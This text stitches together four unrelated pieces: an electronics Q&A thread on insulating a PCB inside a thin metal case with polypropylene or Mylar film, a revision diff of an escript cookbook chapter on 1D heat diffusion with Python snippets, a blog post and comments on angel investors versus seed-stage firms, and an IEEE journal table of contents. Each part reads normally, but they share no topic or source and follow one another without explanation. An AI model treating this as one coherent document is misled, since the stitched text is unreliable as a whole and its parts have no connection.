For a miniature product, I want the smallest possible product enclosure around the PCB. I figure I can get away with a 1 mm thick metal sheet enclosure. But I (probably) also need an insulator between the circuit board and the case, so nothing shorts out. What's the thinnest way I can make the inside of the metal case insulative? Paint? Powder coat? Paper?

-

What peak voltage (and max freq)? Any regulatory requirements? In what environment will it operate? – tyblu Sep 22 '12 at 4:58

5 V USB used only occasionally. 3.3 V logic. +/- 9 V peak-to-peak low-current AC. FCC. Consumer electronics in everyday conditions; continental US. – EvolvedAI Sep 22 '12 at 5:24

-

(1 mm steel is thick!) The isolation may not be required, since you're probably (S)ELV. Anyway, it's not going to cost you much space-wise. I wouldn't mess with paint sprays and such. Agreed, it's the thinnest, but I assume you can afford the thickness of a 0.1 mm PP (polypropylene; PP has very low water absorption) sheet? Try to use only SMT parts, and mount them single-sided. PTH components will add at least 2 mm because of the pins sticking out at the other side. A single-sided PCB may be glued directly onto the PP sheet, which in turn you glue to the bottom of the enclosure. If you manage to do the wiring of the PCB single-sided as well, you don't even need the PP insulation. It may be worth using a couple of 0 Ω jumpers to ease the layout. You can save an extra couple tenths of a mm by using a 0.8 mm PCB instead of the standard 1.6 mm. The thinner PCB is less stiff, but at the small size it's not a problem, and when glued against the enclosure it won't get any mechanical strain anyway.

-

Thanks! So even if a +5 V and a GND are touching the polypropylene 1 mm or 2 apart from each other, it always presents high resistance? – EvolvedAI Sep 22 '12 at 8:29

Is this the stuff? goodfellow.com/catalogue/… – EvolvedAI Sep 22 '12 at 8:30

@Evolved - Yep, that's the one.
It mentions a roll width of 650 mm, though, and a roll may be 600 m worth (mine is), so that may be, er, somewhat much. You may ask them for a sample. The PP has a volumetric resistivity of > 10^15, which is, er, pretty high. At these low voltages you're absolutely safe. – stevenvh Sep 22 '12 at 8:47

For playing (and better), "Mylar" [tm][literally] will do what you want as long as you do not mechanically puncture it. OHP (remember them?) projection film is/was usually Mylar. That's a version of polyester, but it's going to behave well enough for what you want. – Russell McMahon Sep 22 '12 at 11:06

@Russell - I guess a lot of plastics will be suitable, but I'm not a mechanical engineer, nor a chemical one, so I don't know them all. I do know that PP has about the lowest water absorption, and a high resistivity (I forgot the dimension ohm.cm in my previous comment). – stevenvh Sep 22 '12 at 11:35
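The "absolutely safe" claim is easy to put in numbers. A rough sketch, assuming (as the later comment clarifies) the > 10^15 figure is volumetric resistivity in ohm·cm, taken as exactly 1e15, with an arbitrary 1 mm² contact patch through a 0.1 mm sheet; none of these exact values come from the thread:

```python
# Rough leakage estimate through a 0.1 mm polypropylene sheet.
# Assumed values: resistivity exactly 1e15 ohm*cm (thread says ">1e15"),
# 1 mm^2 contact area, 5 V across the sheet.

rho = 1e15 * 1e-2   # volumetric resistivity: ohm*cm -> ohm*m (1e13 ohm*m)
t = 0.1e-3          # sheet thickness in m
area = 1e-6         # contact area in m^2 (1 mm^2)

resistance = rho * t / area   # R = rho * t / A for bulk conduction
current = 5.0 / resistance    # Ohm's law at 5 V

print(f"R = {resistance:.1e} ohm")  # R = 1.0e+15 ohm
print(f"I = {current:.1e} A")       # I = 5.0e-15 A, i.e. femtoamps
```

Femtoamp-scale leakage, which is why surface contamination and moisture, not the bulk plastic, dominate in practice.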
# Diff of /trunk/doc/cookbook/example01.tex

revision 2800 by ahallam, Wed Nov 25 05:01:43 2009 UTC
revision 2801 by ahallam, Thu Dec 3 01:45:48 2009 UTC

# Line 11

  %
  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

+ We will start by examining a simple one dimensional heat diffusion example. This problem will provide a good launch pad to build our knowledge of \esc and demonstrate how to solve simple partial differential equations (PDEs)\footnote{Wikipedia provides an excellent and comprehensive introduction to \textit{Partial Differential Equations} \url{http://en.wikipedia.org/wiki/Partial_differential_equation}, however their relevance to \esc and implementation should become a clearer as we develop our understanding further into the cookbook.}

  \section{One Dimensional Heat Diffusion in an Iron Rod}
  \sslist{onedheatdiff001.py and cblib.py}
  %\label{Sec:1DHDv0}
- We will start by examining a simple one dimensional heat diffusion example. This problem will provide a good launch pad to build our knowledge of \esc and how to solve simple partial differential equations (PDEs)\footnote{Wikipedia provides an excellent and comprehensive introduction to \textit{Partial Differential Equations} \url{http://en.wikipedia.org/wiki/Partial_differential_equation}, however their relevance to \esc and implementation should become a clearer as we develop our understanding further into the cookbook.}
+ The first model consists of a simple cold iron bar at a constant temperature of zero \reffig{fig:onedhdmodel}. The bar is perfectly insulated on all sides with a heating element at one end. Intuition tells us that as heat is applied; energy will disperse along the bar via conduction. With time the bar will reach a constant temperature equivalent to that of the heat source.
  \begin{figure}[h!]
  \centerline{\includegraphics[width=4.in]{figures/onedheatdiff}}
  \caption{One dimensional model of an Iron bar.}
  \label{fig:onedhdmodel}
  \end{figure}
- The first model consists of a simple cold iron bar at a constant temperature of zero \reffig{fig:onedhdmodel}. The bar is perfectly insulated on all sides with a heating element at one end. Intuition tells us that as heat is applied; energy will disperse along the bar via conduction. With time the bar will reach a constant temperature equivalent to the heat source.
  \subsection{1D Heat Diffusion Equation}
  We can model the heat distribution of this problem over time using the one dimensional heat diffusion equation\footnote{A detailed discussion on how the heat diffusion equation is derived can be found at \url{http://online.redwoods.edu/instruct/darnold/DEProj/sp02/AbeRichards/paper.pdf}};
  which is defined as:

# Line 33

  where $\rho$ is the material density, $c\hackscore p$ is the specific heat and $\kappa$ is the thermal conductivity constant for a given material\footnote{A list of some common thermal conductivities is available from Wikipedia \url{http://en.wikipedia.org/wiki/List_of_thermal_conductivities}}.
  The heat source is defined by the right hand side of \ref{eqn:hd} as $q\hackscore{H}$; this can take the form of a constant or a function of time and space. For example $q\hackscore{H} = Te^{-\gamma t}$ where we have the output of our heat source decaying with time. There are also two partial derivatives in \ref{eqn:hd}; $\frac{\partial T}{\partial t}$ describes the change in temperature with time while $\frac{\partial ^2 T}{\partial x^2}$ is the spatial change of temperature. As there is only a single spatial dimension to our problem, our temperature solution $T$ is only dependent on the time $t$ and our position along the iron bar $x$.

- \subsection{Escript, PDEs and The General Form}
+ \subsection{\esc, PDEs and The General Form}
  Potentially, it is now possible to solve \ref{eqn:hd} analytically and this would produce an exact solution to our problem. However, it is not always possible or practical to solve a problem this way. Alternatively, computers can be used to solve these kinds of problems when a large number of sums or a more complex visualisation is required. To do this, a numerical approach is required - \esc can help us here - and it becomes necessary to discretize the equation so that we are left with a finite number of equations for a finite number of spatial and time steps in the model. While discretization introduces approximations and a degree of error, we find that a sufficiently sampled model is generally accurate enough for the requirements of the modeller.

  \esc interfaces with any given PDE via a general form. In this example we will illustrate a simpler version of the full linear PDE general form which is available in the \esc user's guide. A simplified form that suits our heat diffusion problem\footnote{In the form of the \esc users guide which using the Einstein convention is written as

# Line 95

  T(x,0) = T\hackscore{ref} = 0

  for all $x$ in the domain.

  \subsection{Boundary Conditions}
- With the PDE sufficiently modified, consideration must now be given to the boundary conditions of our model. Typically there are two main types of boundary conditions known as Neumann and Dirichlet\footnote{More information on Boundary Conditions is available at Wikipedia \url{http://en.wikipedia.org/wiki/Boundary_conditions}}. In this example, we have utilised both conditions. Dirichlet is conceptually simpler and is used to prescribe a known value to the model on its boundary. This is like holding a snake by the tail; we know where the tail will be as we hold it however, we have no control over the rest of the snake. Dirichlet boundary conditions exist where we have applied our heat source. As the heat source is a constant, we can simulate its presence on that boundary. This is done by continuously resetting the temperature of the boundary, so that is is the same as the heat source.
+ With the PDE sufficiently modified, consideration must now be given to the boundary conditions of our model. Typically there are two main types of boundary conditions known as Neumann and Dirichlet\footnote{More information on Boundary Conditions is available at Wikipedia \url{http://en.wikipedia.org/wiki/Boundary_conditions}}. In this example, we have utilised both conditions. Dirichlet is conceptually simpler and is used to prescribe a known value to the model on its boundary. For this model Dirichlet boundary conditions exist where we have applied our heat source. As the heat source is a constant, we can simulate its presence on that boundary. This is done by continuously resetting the temperature of the boundary, so that it is the same as the heat source.

+ Neumann boundary conditions describe the radiation or flux that is normal to the boundary surface. This aptly describes our insulation conditions as we do not want to exert a constant temperature as with the heat source. However, we do want to prevent any loss of energy from the system.

- Neumann boundary conditions describe the radiation or flux normal to the boundary surface. This aptly describes our insulation conditions as we do not want to exert a constant temperature as with the heat source. However, we do want to prevent any loss of energy from the system. These natural boundary conditions can be described by specifying a radiation condition which prescribes the normal component of the flux $\kappa T\hackscore{,i}$ to be proportional
+ While the flux for this model is zero, it is important to note the requirements for Neumann boundary conditions. For heat diffusion these can be described by specifying a radiation condition which prescribes the normal component of the flux $\kappa T\hackscore{,i}$ to be proportional
  to the difference of the current temperature to the surrounding temperature $T\hackscore{ref}$; in general terms this is;

  \kappa T\hackscore{,i} \hat{n}\hackscore i = \eta (T\hackscore{ref}-T)

# Line 128

  A\hackscore{00}=A; A\hackscore{01}=A\hac

  \subsection{Developing a PDE Solution Script}
- To solve \ref{eqn:hd} we will write a simple python script which uses the \modescript, \modfinley and \modmpl modules. At this point we assume that you have some basic understanding of the python programming language. If not there are some pointers and links available in Section \ref{sec:escpybas}.
+ \label{sec:key}
+ To solve the heat diffusion equation (equation \ref{eqn:hd}) we will write a simple \pyt script which uses the \modescript, \modfinley and \modmpl modules. At this point we assume that you have some basic understanding of the \pyt programming language. If not there are some pointers and links available in Section \ref{sec:escpybas}.

- Our goal here is to develop a script for \esc that will solve the heat equation at successive time steps for a predefined period using our general form \ref{eqn:hdgenf}. Firstly it is necessary to import all the libraries\footnote{The libraries contain predefined scripts that are required to solve certain problems, these can be simple like sin and cos functions or more complicated like those from our \esc library.}
+ By developing a script for \esc, the heat diffusion equation can be solved at successive time steps for a predefined period using our general form \ref{eqn:hdgenf}. Firstly it is necessary to import all the libraries\footnote{The libraries contain predefined scripts that are required to solve certain problems, these can be simple like $sine$ and $cosine$ functions or more complicated like those from our \esc library.}
  that we will require.

  \begin{python}
  from esys.escript import *

# Line 145

  import pylab as pl #Plotting package.
  import numpy as np #Array package.
  import os #This package is necessary to handle saving our data.
  \end{python}

- It is generally a good idea to import all of the \modescript library, although if you know the packages you need you can specify them individually. The function \verb|LinearPDE| has been imported for ease of use later in the script. \verb|Rectangle| is going to be our type of domain. The package \verb|unitsSI| is a module of \esc that provides support for units definitions with our variables; and the \verb|os| package is needed to handle file outputs once our PDE has been solved. \verb|pylab| and \verb|numpy| are modules developed independently of \esc. They are used because they have efficient plotting and array handling capabilities.
+ It is generally a good idea to import all of the \modescript library, although if the functions and classes required are known they can be specified individually. The function \verb|LinearPDE| has been imported explicitly for ease of use later in the script. \verb|Rectangle| is going to be our type of model. The module \verb|unitsSI| provides support for SI unit definitions with our variables; and the \verb|os| module is needed to handle file outputs once our PDE has been solved. \verb|pylab| and \verb|numpy| are modules developed independently of \esc. They are used because they have efficient plotting and array handling capabilities.

  Once our library dependencies have been established, defining the problem specific variables is the next step. In general the number of variables needed will vary between problems. These variables belong to two categories. They are either directly related to the PDE and can be used as inputs into the \esc solver, or they are script variables used to control internal functions and iterations in our problem. For this PDE there are a number of constants which will need values.
- Firstly, the domain upon which we wish to solve our problem needs to be defined. There are many different types of domains in \modescript which we will demonstrate in later tutorials but for our iron rod, we will simply use a rectangular domain.
+ Firstly, the model upon which we wish to solve our problem needs to be defined. There are many different types of models in \modescript which we will demonstrate in later tutorials but for our iron rod, we will simply use a rectangular model.

  Using a rectangular domain simplifies our rod which would be a \textit{3D} object, into a single dimension. The iron rod will have a lengthways cross section that looks like a rectangle. As a result we do not need to model the volume of the rod because a cylinder is symmetrical about its centre. There are four arguments we must consider when we decide to create a rectangular domain, the model \textit{length}, \textit{width} and \textit{step size} in each direction. When defining the size of our problem it will help us determine appropriate values for our domain arguments. If we make our dimensions large but our step sizes very small we will to a point, increase the accuracy of our solution. Unfortunately we also increase the number of calculations that must be solved per time step. This means more computational time is required to produce a solution. In our \textit{1D} problem we will define our bar as being 1 metre long. An appropriate \verb|ndx| would be 1 to 10\% of the length.
Our \verb|ndy| need only be 1, This is because our problem stipulates no partial derivatives in the $y$ direction so the temperature does not vary with $y$. Thus the domain parameters can be defined as follows; note we have used the \verb unitsSI  convention to make sure all our input units are converted to SI.  Using a rectangular model simplifies our rod which would be a \textit{3D} object, into a single dimension. The iron rod will have a lengthways cross section that looks like a rectangle.  As a result we do not need to model the volume of the rod because a cylinder is symmetrical about its centre. There are four arguments we must consider when we decide to create a rectangular model, the model \textit{length}, \textit{width} and \textit{step size} in each direction. When defining the size of our problem it will help us determine appropriate values for our model arguments. If we make our dimensions large but our step sizes very small we will to a point, increase the accuracy of our solution. Unfortunately we also increase the number of calculations that must be solved per time step. This means more computational time is required to produce a solution. In this \textit{1D} problem, the bar is defined as being 1 metre long. An appropriate step size \verb|ndx| would be 1 to 10\% of the length. Our \verb|ndy| need only be 1, this is because our problem stipulates no partial derivatives in the $y$ direction. Thus the temperature does not vary with $y$. Hence, the model parameters can be defined as follows; note we have used the \verb unitsSI  convention to make sure all our input units are converted to SI. 155  \begin{python}  \begin{python} 156  #Domain related.  #Domain related. 
157  mx = 1*m #meters - model length  mx = 1*m #meters - model length # Line 184  Now that we know our inputs we will buil Line 186  Now that we know our inputs we will buil 186  #generate domain using rectangle  #generate domain using rectangle 187  rod = Rectangle(l0=mx,l1=my,n0=ndx, n1=ndy)  rod = Rectangle(l0=mx,l1=my,n0=ndx, n1=ndy) 188  \end{python}  \end{python} 189  \verb rod  now describes a domain in the manner of Section \ref{ss:domcon}. As we define our variables, various function spaces will be created to accomodate them. There is an easy way to extract finite points from the domain \verb|rod| using the domain property function \verb|getX()| . This function sets the vertices of each cell as finite points to solve in the solution. If we let \verb|x| be these finite points, then;  \verb rod  now describes a domain in the manner of Section \ref{ss:domcon}. As we define our variables, various function spaces will be created to accommodate them. There is an easy way to extract finite points from the domain \verb|rod| using the domain property function \verb|getX()| . This function sets the vertices of each cell as finite points to solve in the solution. If we let \verb|x| be these finite points, then; 190  \begin{python}  \begin{python} 191  #extract finite points - the solution points  #extract finite points - the solution points 192  x=rod.getX()  x=rod.getX() 193  \end{python}  \end{python} 194  The data locations of specific function spaces can be returned in a similar manner by extracting the relevent function space from the domain followed by the \verb .getX()  operator.  The data locations of specific function spaces can be returned in a similar manner by extracting the relevant function space from the domain followed by the \verb .getX()  operator. 195 196  With a domain and all our required variables established, it is now possible to set up our PDE so that it can be solved by \esc. 
The first step is to define the type of PDE that we are trying to solve in each time step. In this example it is a single linear PDE\footnote{in comparison to a system of PDEs which will be discussed later.}. We also need to state the values of our general form variables.  With a domain and all our required variables established, it is now possible to set up our PDE so that it can be solved by \esc. The first step is to define the type of PDE that we are trying to solve in each time step. In this example it is a single linear PDE\footnote{in comparison to a system of PDEs which will be discussed later.}. We also need to state the values of our general form variables. 197  \begin{python}  \begin{python} # Line 201  In a few special cases it may be possibl Line 203  In a few special cases it may be possibl 203  \label{eqn:symm}  \label{eqn:symm} 204  A\hackscore{jl}=A\hackscore{lj}  A\hackscore{jl}=A\hackscore{lj} 205 206  Symmetry is only dependent on the $A$ coefficient in the general form and the others $D$ and $d$ as well as the RHS coefficients $Y$ and $y$ may take any value. From the above definition we can see that our PDE is symmetric. The \verb LinearPDE  class provides the method \method{checkSymmetry} to check if the given PDE is symmetric. As our PDE is symmetrical we will enable symmetry via;  Symmetry is only dependent on the $A$ coefficient in the general form and the other coefficients $D$ and $d$ as well as the RHS $Y$ and $y$ may take any value. From the above definition we can see that our PDE is symmetric. The \verb LinearPDE  class provides the method \method{checkSymmetry} to check if the given PDE is symmetric. As our PDE is symmetrical we will enable symmetry via; 207  \begin{python}  \begin{python} 208   myPDE.setSymmetryOn()   myPDE.setSymmetryOn() 209  \end{python}  \end{python} 210 211  We now need to specify our boundary conditions and initial values. 
The initial values required to solve this PDE are temperatures for each discrete point in our domain. We will set our bar to:  We now need to specify our boundary conditions and initial values. The initial values required to solve this PDE are temperatures for each discrete point in our model. We will set our bar to: 212  \begin{python}  \begin{python} 213   T = Tref   T = Tref 214  \end{python}  \end{python} 215  Boundary conditions are a little more difficult. Fortunately the escript solver will handle our insulated boundary conditions by default with a zero flux operator. However, we will need to apply our heat source $q_{H}$ to the end of the bar at $x=0$ . \esc makes this easy by letting us define areas in our domain. The finite points in the domain were previously defined as \verb x  and it is possible to set all of points that satisfy $x=0$ to \verb q  via the \verb whereZero()  function. There are a few \verb where  functions available in \esc. They will return a value \verb 1  where they are satisfied and \verb 0  where they are not. In this case our \verb qH  is only applied to the far LHS of our model as required.  Boundary conditions are a little more difficult. Fortunately the \esc solver will handle our insulated boundary conditions by default with a zero flux operator. However, we will need to apply our heat source $q_{H}$ to the end of the bar at $x=0$ . \esc makes this easy by letting us define areas in our model. The finite points in the model were previously defined as \verb x  and it is possible to set all of points that satisfy $x=0$ to \verb q  via the \verb whereZero()  function. There are a few \verb where  functions available in \esc. They will return a value \verb 1  where they are satisfied and \verb 0  where they are not. In this case our \verb qH  is only applied to the far LHS of our model as required. 216  \begin{python}  \begin{python} 217  # ... set heat source: ....  # ... set heat source: .... 
218  qH=q*whereZero(x[0])  qH=q*whereZero(x[0]) 219  \end{python}  \end{python} 220 221  Finally we will initialise an iteration loop to solve our PDE for all the time steps we specified in the variable section. As the RHS of the general form is dependent on the previous values for temperature \verb T  across the bar this must be updated in the loop. Our output at each timestep is \verb T  the heat distribution and \verb totT  the total heat in the system.  Finally we will initialise an iteration loop to solve our PDE for all the time steps we specified in the variable section. As the RHS of the general form is dependent on the previous values for temperature \verb T  across the bar this must be updated in the loop. Our output at each time step is \verb T  the heat distribution and \verb totT  the total heat in the system. 222  \begin{python}  \begin{python} 223  while t<=tend:  while t<=tend: 224      i+=1 #increment the counter      i+=1 #increment the counter # Line 227  while t<=tend: Line 229  while t<=tend: 229  \end{python}  \end{python} 230 231  \subsection{Plotting the heat solutions}  \subsection{Plotting the heat solutions} 232  Visualisation of the solution can be achieved using \mpl a module contained with \pylab. We start by modifying our solution script from before. Prior to the \verb while  loop we will need to extract our finite solution points to a data object that is compatible with \mpl. First it is necessary to convert \verb x  to a list of tuples. These are then converted to a \numpy array and the $x$ locations extracted via an array slice to the variable \verb plx  .  Visualisation of the solution can be achieved using \mpl a module contained within \pylab. We start by modifying our solution script from before. Prior to the \verb while  loop we will need to extract our finite solution points to a data object that is compatible with \mpl. First it is necessary to convert \verb x  to a list of tuples. 
These are then converted to a \numpy array and the $x$ locations extracted via an array slice to the variable \verb plx  . 233  \begin{python}  \begin{python} 234  #convert solution points for plotting  #convert solution points for plotting 235  plx = x.toListOfTuples()  plx = x.toListOfTuples() 236  plx = np.array(plx) #convert to tuple to numpy array  plx = np.array(plx) #convert to tuple to numpy array 237  plx = plx[:,0] #extract x locations  plx = plx[:,0] #extract x locations 238  \end{python}  \end{python} 239  As there are two solution outputs, we will generate two plots and save each to a file for every time step in the solution. The following is appended to the end of the \verb while  loop and creates two figures. The first figure is for the temperature distribution, and the second the total temperature in the bar. Both cases are similar with a few minor changes for scale and labelling. We start by converting the solution to a tuple and then plotting this against our \textit{x coordinates} \verb plx  from before. The axis is then standardised and a title applied. The figure is then saved to a *.png file and cleared for the following iteration.  As there are two solution outputs, we will generate two plots and save each to a file for every time step in the solution. The following is appended to the end of the \verb while  loop and creates two figures. The first figure is for the temperature distribution, and the second the total temperature in the bar. Both cases are similar with a few minor changes for scale and labelling. We start by converting the solution to a tuple and then plotting this against our \textit{x coordinates} \verb plx  from before. The axis is then standardised and a title applied. Finally, the figure is saved to a *.png file and cleared for the following iteration. 
\begin{python}
    #establish figure 1 for temperature vs x plots
    tempT = T.toListOfTuples(scalarastuple=False)
    # ...
    pl.figure(2)
    pl.plot(plx,tottempT)
    pl.axis([0,1.0,9.657E08,12000+9.657E08])
    pl.title("Total temperature across Rod")
    pl.savefig(os.path.join(save_path+"/totT","ttrodpyplot%03d.png")%i)
    pl.clf()
\end{python}

\subsubsection{Parallel scripts (MPI)}
In some of the example files for this cookbook the plotting commands are a little different. For example,
\begin{python}
    if getMPIRankWorld() == 0:
        pl.savefig(os.path.join(save_path+"/totT","ttrodpyplot%03d.png")%i)
        pl.clf()
\end{python}
The additional \verb|if| statement is not necessary for normal desktop use. It becomes important for scripts run on parallel computers.
Its purpose is to ensure that only one copy of the file is written. For more details on writing scripts for parallel computing please consult the \emph{user's guide}.

\subsection{Make a video}
Our saved plots from the previous section can be cast into a video using the following command appended to the end of the script. \verb|mencoder| is Linux-only, however, and users of other platforms will need to use an alternative video encoder.
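The encoding command itself is not reproduced in this section. As a sketch only (the frame directory and output file name below are assumptions, not values taken from the cookbook, and should be adjusted to match the script's \verb|save_path|), a typical \verb|mencoder| call could be issued from the end of the script like this:

```python
import os

# Assumed locations -- adjust to match the script's save_path.
frame_dir = "data/totT"      # directory holding the numbered PNG frames
output = "temperature.avi"   # name of the resulting video file

# A typical mencoder invocation: stitch the numbered PNG frames into an
# MPEG-4 AVI at 10 frames per second using the mf:// input scheme.
cmd = ("mencoder mf://%s/*.png -mf type=png:fps=10 "
       "-ovc lavc -lavcopts vcodec=mpeg4 -o %s") % (frame_dir, output)

# mencoder is Linux-only; attempt the encode only when it is installed.
if os.system("which mencoder > /dev/null 2>&1") == 0:
    os.system(cmd)
```

On other platforms the same frame sequence can be fed to an alternative encoder in the same way; only the command string changes.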
http://reactionwheel.net/2010/09/opm.html
## OPM

I think Chris Dixon is one of the smartest investors around. I co-invested in him when he was an angel and I've co-invested with his early stage fund, Founder's Collective. But while I generally agree with his recent post on venture investing segmentation, I need to call bull on this:

> What we are witnessing now is the VC industry segmenting as it matures. Mentorship and angel funding are performed more effectively by specialized firms.

It's kind of surprising to me that someone who did such an excellent job as an angel would imply that he really wasn't the best investor for those companies in the first place but, hey, he's entitled to his opinion. But saying you'd be a better angel if you were a firm is like saying that you'd be a better amateur athlete if you went pro*. You can't be an angel if you have a fund. And though this sounds like a semantic argument, it makes a real-world difference to entrepreneurs.

What bothers me is the lumping of angel motivation and technique in with the "Super-Angel"/micro-VC motivations and techniques. The otherwise excellent David Lerner makes this mistake when he says he intends to explicate the angel investing world and then lists, as half his angels, people with funds. This is a fundamental analytical mistake: taking the average of a bimodal distribution tells you nothing very interesting at all.

There are reasons why angels existed in the first place. While the lower cost of getting a startup from A to B has changed the dynamics of early stage rounds, it hasn't changed most of the fundamental advantages of having individuals investing their own money: a personal–rather than institutional–connection to entrepreneurs, the ability to make quick decisions, the ability to make decisions that may not seem fiduciarily responsible but are for the greater good, primary expertise in an industry and in company building rather than in money-management, etc. Most importantly–despite what the Supreme Court may think–firms are not people and they don't, in the long run, act like people. Angels do.

-----

\* While this is the reasoning behind the modern Olympics and many college football programs, it flies in the face of the actual meaning of "amateur" and destroys what makes amateur athletics so appealing.

1. Jerry, Agreed – I need a mentor, teacher and advocate. Not a bank. Excellently put.

2. chris dixon says: Hey Jerry – I think I wasn't clear. I meant the emphasis to be on "specialized" vs "general", not "firms" vs "individuals." I was arguing for the need for specialized early stage firms ("superangels"). I think individual angels play a very important role. Almost all of our deals include them and we actively encourage entrepreneurs to do so. And I also think pure angel rounds are a great thing for entrepreneurs and innovation in general. -chris dixon

3. Chris – Thanks for the clarification. Sorry for using you as a stalking horse :)

   Jeff – You might need both, you never know… every company is different. I like the VCs and when I see a company I really like I often try to pull one in, because it's usually the case that I can't do the whole round by myself and pulling together enough $50k checks to do a $500k round can be time consuming.

   In most of the early-stage companies I see (and keep in mind the selection bias here) companies move from needing more advice/specialized expertise and less money to needing more money and less outside expertise. This argues for the segmentation that Chris blogged about. Sometimes that outside expertise can come from a YCombinator or a Betaworks, but what they can help you with resides in the scope of the people running them. If you need knowledge of something a bit more esoteric (the market for selling data to adnets, DSPs and agencies, say) you won't find that in the incubators, IMHO. Every person, every incubator exec, every VC, every angel can only know so much. And usually they have either breadth or depth; there's a bandwidth constraint on any person's ability to take in information. Incubators provide deep expertise in broadly needed areas. In most emerging, industry-specific areas they do not. In those cases you find some angels.

4. Thank you Jerry. I'm still hunting. I need two niche mentors. Not easy. Thanks for the insight. It was very helpful.
http://ieeexplore.ieee.org/xpl/tocresult.jsp?reload=true&isnumber=5350927
# IEEE Transactions on Instrumentation and Measurement

Publication Year: 2010, Page(s):C1 - 1

• ### IEEE Transactions on Instrumentation and Measurement publication information
Publication Year: 2010, Page(s): C2

• ### Special Section on the 2008 Advanced Methods for Uncertainty Estimation in Measurement Workshop
Publication Year: 2010, Page(s):2 - 3

• ### Reducing Uncertainty With Seismic Measurements While Drilling
Publication Year: 2010, Page(s):4 - 14. Cited by: Papers (7)
This paper discusses both seismic checkshot data inversion and seismic waveform look-ahead imaging while drilling. We investigate the estimation under real-time data uncertainties of interval velocity profiles calculated from checkshot measurements acquired while drilling. It is found that real-time checkshots may suffer from downhole time-picking errors in addition to an unpredictable clock drift...

• ### How to Process the Random Part of RFVs: Comparison of Available Methods and New Proposal
Publication Year: 2010, Page(s):15 - 26. Cited by: Papers (10)
In the recent years, fuzzy variables (FVs) and random-fuzzy variables (RFVs) have been proposed to represent the measurement results with their associated uncertainty. However, up to now, the different authors do not yet agree in the mathematical way FVs should be composed together, so different approaches have been proposed. This paper compares these approaches to find their advantages and disadv...

• ### Uncertainty Modeling and Propagation Through RFVs for the Assessment of CADx Systems in Digital Mammography
Publication Year: 2010, Page(s):27 - 38. Cited by: Papers (6)
In this paper, we consider uncertainty handling and propagation by means of random fuzzy variables (RFVs) through a computer-aided-diagnosis (CADx) system for the early diagnosis of breast cancer. In particular, the denoising and the contrast enhancement of microcalcifications is specifically addressed, providing a novel methodology for separating the foreground and the background in the image to...

• ### Transformation of Bimodal Probability Distributions Into Possibility Distributions
Publication Year: 2010, Page(s):39 - 47. Cited by: Papers (4)
At the application level, it is important to be able to define the measurement result as an interval that will contain an important part of the distribution of the measured values, that is, a coverage interval. This practice acknowledged by the International Organization for Standardization (ISO) Guide is a major shift from the probabilistic representation. It can be viewed as a probability/possib...

• ### Extending Polynomial Chaos to Include Interval Analysis
Publication Year: 2010, Page(s):48 - 55. Cited by: Papers (9)
Polynomial chaos theory (PCT) has been proven to be an efficient and effective way to represent and propagate uncertainty through system models and algorithms in general. In particular, PCT is a computationally efficient way to analyze and solve dynamic models under uncertainty. This paper presents a new way to use a polynomial expansion to incorporate uncertainties that are not expressed in terms...

• ### Measuring and Extraction of Biological Information on New Handheld Biochip-Based Microsystem
Publication Year: 2010, Page(s):56 - 62. Cited by: Papers (1), Patents (1)
This paper proposes techniques for the extraction of biological information in a recently developed handheld biochip-based microsystem. The microsystem is based on a magnetoresistive array biochip composed of a number of sensing sites with magnetic tunneling junctions (MTJ) and diodes. Different techniques are addressed to drive the MTJs with different types of signals. Different filtering strateg...

• ### FPGA-Based Multiple-Channel Vibration Analyzer for Industrial Applications in Induction Motor Failure Detection
Publication Year: 2010, Page(s):63 - 72. Cited by: Papers (41)
Early detection of failures in equipment is one of the most important concerns to industry. Many techniques have been developed for early failure detection in induction motors. There is the necessity of low-cost instrumentation for online multichannel measurement and analysis of vibration in the frequency domain, and this could be fixed to the machine for continuous monitoring to provide a reliabl...

• ### A Low-Cost Voltage-to-Current Calibration Technique for Multiple-Sensor Systems
Publication Year: 2010, Page(s):73 - 77. Cited by: Papers (2)
Systems with multiple sensors pose a problem of heterogeneity, i.e., different sensors have different outputs subject to the same excitation. To tackle this problem, this paper presents a calibration technique for multiple-sensor applications. An array of voltage-to-current converters, followed by a summing inverter, is employed to aggregate the responses of the system, which originated from heter...

• ### Helmholtz-Type Regularization Method for Permittivity Reconstruction Using Experimental Phantom Data of Electrical Capacitance Tomography
Publication Year: 2010, Page(s):78 - 83. Cited by: Papers (14)
Electrical capacitance tomography (ECT) attempts to image the permittivity distribution of an object by measuring the electrical capacitance between sets of electrodes placed around its periphery. Image reconstruction in ECT is a nonlinear ill-posed inverse problem, and regularization methods are needed to stabilize this inverse problem. The reconstruction of complex shapes (sharp edges) and absol...

• ### Tool for Automated Instruction Set Characterization for Software Power Estimation
Publication Year: 2010, Page(s):84 - 91. Cited by: Papers (2)
The complexity and functionality of mobile digital devices is continuously growing. This results in a higher energy consumption of such devices. To counteract this trend, it is mandatory to accomplish software power optimizations based on accurate power consumption models characterized for the processor. This paper presents an environment for automated instruction set characterization based on phy...

• ### On the Modeling of New Tunnel Junction Magnetoresistive Biosensors
Publication Year: 2010, Page(s):92 - 100. Cited by: Papers (3)
A fully integrated biochip based on a 16 × 16 scalable matrix structure of aluminum oxide magnetic tunnel junctions (MTJs) and thin-film diodes (TFDs of hydrogenated amorphous silicon) was fabricated and included as the biosensor of a portable handheld microsystem developed for biomolecular recognition detection using magnetic labels [deoxyribonucleic acid (DNA) hybridization, antibody antigen in...

• ### Constructing Online Testable Circuits Using Reversible Logic
Publication Year: 2010, Page(s):101 - 109. Cited by: Papers (34)
With the advent of nanometer technology, circuits are more prone to transient faults that can occur during its operation. Of the different types of transient faults reported in the literature, the single-event upset (SEU) is prominent. Traditional techniques such as triple-modular redundancy (TMR) consume large area and power. Reversible logic has been gaining interest in the recent past due to it...

• ### Ultrasound Transducers for Large-Scale Metrology: A Performance Analysis for Their Use by the MScMS
Publication Year: 2010, Page(s):110 - 121. Cited by: Papers (9)
The Mobile Spatial coordinate Measuring System (MScMS) is a distributed wireless-sensor-network-based system used to perform dimensional measurements of large-scale objects. The system consists of a wireless mobile probe with ultrasonic (US) transceivers, the position of which is determined using a distributed constellation of US transceivers arranged around the measuring area. These US transceive...

• ### Pileup Correction Algorithms for Very-High-Count-Rate Gamma-Ray Spectrometry With NaI(Tl) Detectors
Publication Year: 2010, Page(s):122 - 130. Cited by: Papers (15), Patents (3)
